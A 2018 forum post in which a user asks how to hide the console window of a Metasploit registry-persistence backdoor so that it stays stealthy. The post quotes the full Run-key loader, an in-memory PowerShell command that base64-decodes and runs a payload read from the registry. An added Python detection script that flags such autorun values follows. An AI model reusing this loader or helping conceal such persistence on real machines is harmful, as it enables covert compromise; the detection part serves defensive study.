Vurraz
Posted February 7, 2018

Hello,

I installed a registry_persistence backdoor on my lab machine. However, the problem is that once the victim machine boots, you can see an empty cmd prompt shell standing there for 10 seconds. And if I close that shell, then I won't get a meterpreter shell on my Kali machine.

I wish to completely hide that shell on startup, to make the backdoor stealthy. I tried tinkering with the options in the registry key, but it didn't help.

This is the data written to the registry key of the backdoor by default: (HKCU/Software/Microsoft/Windows/CurrentVersion/Run)

%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:Software\8GU6R71p').GetValue('Jg8XwoGx'))))"

I'm testing this on Windows 7 Enterprise.
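Seen from the detection side, the Run value quoted above is only a loader: the payload sits in a second registry key that also has to be collected. The following is an added example, not part of the original post, that triages exported Run-key values for that pattern. The function names, the threshold of three indicators, and the `OneDrive` and `Updater` value names are assumptions made for illustration.

```python
import re

# Traits of the Run-key loader quoted in the post. Each is weak on its own;
# several together on one autorun value warrant investigation.
INDICATORS = {
    "launched_via_cmd": re.compile(r"%comspec%|\bcmd(\.exe)?\s+/", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    "no_profile": re.compile(r"-nop\w*", re.I),
    "in_memory_eval": re.compile(r"\biex\b|invoke-expression", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
    "payload_read_from_registry": re.compile(r"get-item(property)?\s+'?hk(cu|lm):", re.I),
}

# Captures the key and value name the loader reads its payload from.
PAYLOAD_REF = re.compile(
    r"Get-Item\s+'(HK(?:CU|LM):[^']+)'\)\.GetValue\('([^']+)'\)", re.I)


def analyze(data):
    """Return matched indicators and the referenced payload location, if any."""
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(data))
    match = PAYLOAD_REF.search(data)
    return {"hits": hits, "payload_location": match.groups() if match else None}


def triage(run_values, threshold=3):
    """Flag Run-key values whose data matches at least `threshold` indicators."""
    findings = {}
    for name, data in run_values.items():
        result = analyze(data)
        if len(result["hits"]) >= threshold:
            findings[name] = result
    return findings


# Constructed sample of exported Run values. The value names are invented;
# the "Updater" data is the string quoted in the post.
SAMPLE = {
    "OneDrive": r'"C:\Users\lab\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "Updater": r"""%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c "sleep 0; iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item 'HKCU:Software\8GU6R71p').GetValue('Jg8XwoGx'))))" """,
}

if __name__ == "__main__":
    for name, result in triage(SAMPLE).items():
        print(name, result["hits"], "payload at", result["payload_location"])
```
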